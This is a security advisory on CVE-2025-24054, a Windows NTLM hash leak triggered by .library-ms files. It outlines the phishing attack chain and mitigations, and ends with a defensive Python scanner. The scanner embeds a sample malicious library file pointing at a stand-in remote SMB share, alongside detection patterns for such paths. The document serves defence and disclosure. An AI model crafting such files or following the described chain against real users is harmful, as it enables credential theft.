CVE-2025-24054, NTLM Exploit in the Wild
CVE-2025-24054 is a medium-severity vulnerability in Microsoft Windows that allows attackers to leak NTLM (NT LAN Manager) hashes through spoofing techniques. This flaw arises from improper handling of file paths in .library-ms files, enabling attackers to initiate unauthorized SMB (Server Message Block) authentication requests and capture sensitive user credentials.
CVE ID: CVE-2025-24054
Severity: Medium (CVSS 3.1 Score: 6.5)
Affected Component: Windows NTLM Authentication
CWE Reference: CWE-73 – External Control of File Name or Path
Attack Vector: Network
User Interaction: Required (e.g., viewing a folder)
Privileges Required: None
Impact: Confidentiality breach via NTLM hash disclosure
The vulnerability exploits how Windows Explorer processes .library-ms files, which are XML-based files defining custom libraries. When such a file references a remote location (e.g., an attacker-controlled SMB share), merely previewing or navigating to the folder containing the file can trigger an automatic SMB authentication request. This request inadvertently sends the user's NTLM hash to the attacker's server, potentially compromising user credentials.
Notably, the exploit does not require the user to open or execute the malicious file; simple actions like right-clicking or hovering over the file are sufficient to trigger the vulnerability.
Attacker Setup: An attacker sets up a malicious SMB server to capture incoming NTLM authentication requests.
Malicious File Creation: The attacker crafts a .library-ms file that references the malicious SMB server.
Distribution: The malicious file is distributed via phishing emails, often compressed within a ZIP archive alongside other shortcut files like .url, .lnk, or .website.
User Interaction: When the victim extracts the archive or navigates to the folder containing the malicious file, Windows Explorer initiates an SMB authentication request to the attacker's server.
Credential Capture: The attacker's server captures the NTLM hash from the authentication request, which can then be used for offline brute-force attacks or pass-the-hash techniques to gain unauthorized access.
March 11, 2025: Microsoft releases a security patch addressing CVE-2025-24054.
March 19, 2025: Reports emerge of active exploitation in the wild, with attackers leveraging the vulnerability in phishing campaigns targeting organizations in Poland and Romania.
April 17, 2025: The U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds CVE-2025-24054 to its Known Exploited Vulnerabilities Catalog, urging immediate remediation.
Apply Security Updates: Ensure that all Windows systems are updated with the latest security patches released by Microsoft on March 11, 2025.
Disable NTLM Authentication: Where feasible, disable NTLM authentication or restrict its use to minimize exposure.
Implement SMB Signing: Enforce SMB signing to prevent unauthorized SMB communication.
User Education: Train users to recognize and avoid suspicious emails and attachments, particularly those containing unexpected shortcut files.
Network Monitoring: Monitor network traffic for unusual SMB authentication requests, which may indicate exploitation attempts.
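As an added example (not part of the original advisory), the following Python scanner shows one way to triage .library-ms attachments before they reach a user's folder: it parses the library definition XML and reports any location that points at a remote host, which is the trigger described above. The element names follow the Windows library description schema as understood here, and the sample file content is constructed.

```python
"""Flag .library-ms library definitions that point at a remote location.

Added example, not code from the original advisory. A .library-ms file
is XML; its <simpleLocation><url> elements name the folders the library
aggregates. A UNC path or file:// URL on another host is what makes
Explorer authenticate over SMB, so that is what this scanner reports.
"""
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Constructed sample: a library whose only location is a remote share.
# 203.0.113.10 is a documentation address, not a real indicator.
SAMPLE_LIBRARY_MS = """<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@shell32.dll,-34575</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <simpleLocation>
        <url>\\\\203.0.113.10\\share</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""

UNC_RE = re.compile(r"^\\\\([^\\]+)\\")  # \\host\share...

def remote_host(location: str):
    """Return the host a location points at, or None if it is local."""
    loc = location.strip()
    m = UNC_RE.match(loc)
    if m:
        return m.group(1)
    parsed = urlparse(loc)
    if parsed.scheme in ("file", "smb", "webdav") and parsed.netloc:
        return parsed.netloc
    return None  # drive-letter paths and known-folder GUIDs are local

def find_remote_locations(xml_text: str):
    """Return hosts referenced by <url> elements in a .library-ms document."""
    root = ET.fromstring(xml_text)
    hosts = []
    for elem in root.iter():
        # Strip the XML namespace so the check works with or without it.
        if elem.tag.rsplit("}", 1)[-1] == "url" and elem.text:
            host = remote_host(elem.text)
            if host:
                hosts.append(host)
    return hosts

if __name__ == "__main__":
    print("remote locations:", find_remote_locations(SAMPLE_LIBRARY_MS))
```

A mail gateway or EDR script can run `find_remote_locations` over every `.library-ms` extracted from an inbound ZIP and quarantine files that return a non-empty list.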